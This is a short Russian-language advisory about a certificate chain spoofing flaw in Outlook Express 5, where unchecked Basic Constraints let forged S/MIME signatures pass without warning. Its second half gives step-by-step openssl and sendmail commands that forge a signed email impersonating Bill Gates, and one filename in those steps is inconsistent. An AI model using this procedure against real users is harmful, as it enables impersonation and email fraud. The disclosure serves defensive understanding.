В связке Outlook/MIME можно организовать
подмену сертификатов (certificate chain spoofing attack), несмотря на заявление Microsoft, что IE является единственным уязвимым приложением. Уязвимость позволяют любому
представлять верную цифровую подпись в электронном сообщении, которую просмотрит Outlook без каких либо предупреждений. Пример: 

Атакующий создает некорректную цепочку сертификатов: 

[Issuer:VeriSign | Subject:VeriSign] > [Issuer:VeriSign |
Subject:www.thoughtcrime.org] > [Issuer:www.thoughtcrime.org | 
Subject:Bill Gates/billgates@microsoft.com]

Кроме того, Outlook не в состоянии проверять Основные Ограничения (Basic Constraints) на промежуточный сертификат и принимает такой сертификат как правильный. Уязвимость не делает никакого различия между подписанной и не подписанной электронной почтой в Outlook. Пользователи, которые должны использовать Outlook для
получения подписанных сообщений, должны вручную просмотреть и проверить полученные цепочки сертификатов за последние пять лет. Эксплоит: 

  1. Поместите допустимый CA сертификат и секретный ключ в файл «middle.pem». 
  2. Создайте поддельный сертификат, подписывая запрос: 
    openssl genrsa -out key.pem 1024 
    openssl req -new -key key.pem -out leaf.c 
  3. Подпишите CSR с вашим «промежуточным» сертификатом: 
    openssl x509 -req -in leaf.csr -CA middle.pem -CAkey middle.pem -CAcreateserial -out leaf.pem 
  4. Подпишите поддельное E-mail сообщение: 
    openssl smime -sign -in mail.txt -text -out mail.msg -signer leaf.pem -inkey key.pem -certfile middle.pem -from billgates@microsoft.com -to whomever@wherever.com -subject «SM Exploit» 
  5. Пошлите сообщение: 
    cat mail.msg | sendmail whomever@wherever.com

Уязвимость обнаружена в Outlook Express 5.



Оставить мнение